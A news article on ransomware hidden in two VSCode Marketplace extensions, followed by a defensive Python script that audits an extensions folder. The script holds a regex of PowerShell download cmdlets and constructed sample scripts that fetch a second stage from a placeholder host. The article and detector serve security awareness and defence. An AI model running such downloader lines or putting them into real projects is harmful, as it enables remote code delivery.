
Cybersecurity researchers have identified ransomware hidden within two Visual Studio Code (VSCode) Marketplace extensions, raising concerns about the security of Microsoft’s extension approval system. The affected extensions, “ahban.shiba” and “ahban.cychelloworld,” were removed after being flagged, but not before they had been downloaded by users.
Despite Microsoft’s security protocols, the extensions were publicly accessible for an extended period. “Ahban.cychelloworld” was uploaded on 27 October 2024, while “ahban.shiba” became available on 17 February 2025. The VSCode Marketplace, which allows developers to integrate additional tools into Microsoft’s widely used Visual Studio Code platform, has now come under scrutiny for allowing these extensions to pass security checks.
Researchers at security firm ReversingLabs found that both extensions contained a PowerShell script that retrieved additional code from a remote Amazon Web Services (AWS) server. The downloaded script functioned as ransomware, though evidence suggests it was still in an early stage of development. Unlike traditional ransomware that locks down an entire system, this version specifically encrypted files found in C:\users\%username%\Desktop\testShiba.
“Your files have been encrypted. Pay 1 ShibaCoin to ShibaWallet to recover them,” reads the Windows notification message after the completion of the encryption process.
No additional instructions or payment details were included, indicating that the malware might still have been undergoing testing.
Although Microsoft eventually removed the extensions, security researcher Itay Kruk from ExtensionTotal told BleepingComputer that the company's automated scanning system had flagged the malicious code much earlier. ExtensionTotal had alerted Microsoft but did not receive a response.
According to Kruk, the malicious code was introduced in a later update. The initial version of “ahban.cychelloworld” did not contain ransomware; the payload first appeared in version 0.0.2, which became available on 24 November 2024.
“We reported ahban.cychelloworld to Microsoft on 25 November 2024 via an automatic report generated by our scanner,” Kruk told the publication.
Despite the alert, the extension remained accessible for several months, with five additional versions published, each containing the same ransomware payload.
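As an added, defender-side example (not code from the article, ReversingLabs or ExtensionTotal), the following Python audits a local VSCode extensions folder for the two extension IDs named above and for bundled PowerShell scripts that pull a second stage from the network, the delivery pattern the researchers describe. The sample extension directories, script bodies, the `placeholder.invalid` URL and the download-cmdlet list are constructed for this example.

```python
import json
import re
import tempfile
from pathlib import Path

# The two extension IDs named in the article; everything else here is generic.
KNOWN_BAD = {"ahban.shiba", "ahban.cychelloworld"}
# PowerShell download primitives commonly used to fetch a second stage
# (indicator list chosen for this example, not taken from the article).
FETCH_RE = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Start-BitsTransfer",
    re.IGNORECASE)

def audit_extensions(ext_root: Path) -> list[dict]:
    """Return one finding per suspicious extension directory under ext_root
    (on Windows normally %USERPROFILE%\\.vscode\\extensions)."""
    findings = []
    for ext_dir in sorted(p for p in ext_root.iterdir() if p.is_dir()):
        manifest = ext_dir / "package.json"
        if not manifest.is_file():
            continue  # not an extension directory
        meta = json.loads(manifest.read_text(encoding="utf-8"))
        ext_id = f"{meta.get('publisher', '?')}.{meta.get('name', '?')}".lower()
        reasons = []
        if ext_id in KNOWN_BAD:
            reasons.append("known malicious extension id")
        # Flag any bundled PowerShell script that fetches code from the network.
        for ps1 in sorted(ext_dir.rglob("*.ps1")):
            if FETCH_RE.search(ps1.read_text(encoding="utf-8", errors="ignore")):
                reasons.append(f"{ps1.relative_to(ext_dir)} downloads remote code")
        if reasons:
            findings.append({"id": ext_id, "version": meta.get("version"), "reasons": reasons})
    return findings

def demo() -> list[dict]:
    """Audit a constructed folder: a benign extension, one carrying the article's
    ID plus a stage-two downloader, and an unknown ID with a downloader."""
    root = Path(tempfile.mkdtemp())
    samples = {  # (publisher, name, version) -> optional constructed .ps1 body
        ("example", "hello", "1.0.0"): None,
        ("ahban", "cychelloworld", "0.0.2"):
            "Invoke-WebRequest -Uri https://placeholder.invalid/stage2.ps1 -OutFile s.ps1",
        ("other", "tool", "2.1.0"):
            "(New-Object Net.WebClient).DownloadString('https://placeholder.invalid/x')"}
    for (pub, name, ver), script in samples.items():
        d = root / f"{pub}.{name}-{ver}"
        (d / "scripts").mkdir(parents=True)
        (d / "package.json").write_text(
            json.dumps({"publisher": pub, "name": name, "version": ver}), encoding="utf-8")
        if script:
            (d / "scripts" / "update.ps1").write_text(script, encoding="utf-8")
    return audit_extensions(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point `audit_extensions` at the real extensions folder to check a workstation; the ID list is only a starting point, so the PowerShell heuristic is what catches a renamed republish.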
Microsoft’s security review process faces scrutiny
The ability of these extensions to remain undetected for an extended period highlights concerns over Microsoft’s process for reviewing third-party software. The case has drawn attention to the effectiveness of security measures in the VSCode Marketplace, where developers rely on extensions to improve functionality.
Microsoft has faced previous criticism for both delays in addressing security threats and instances where non-malicious extensions were removed too quickly. A recent example involved two popular VSCode themes, namely ‘Material Theme – Free’ and ‘Material Theme Icons – Free’, which were removed after Microsoft detected obfuscated JavaScript. However, later analysis determined that the extensions were not malicious. Following backlash, Microsoft reinstated them and apologised, stating that its security scanning procedures would be improved to prevent future errors.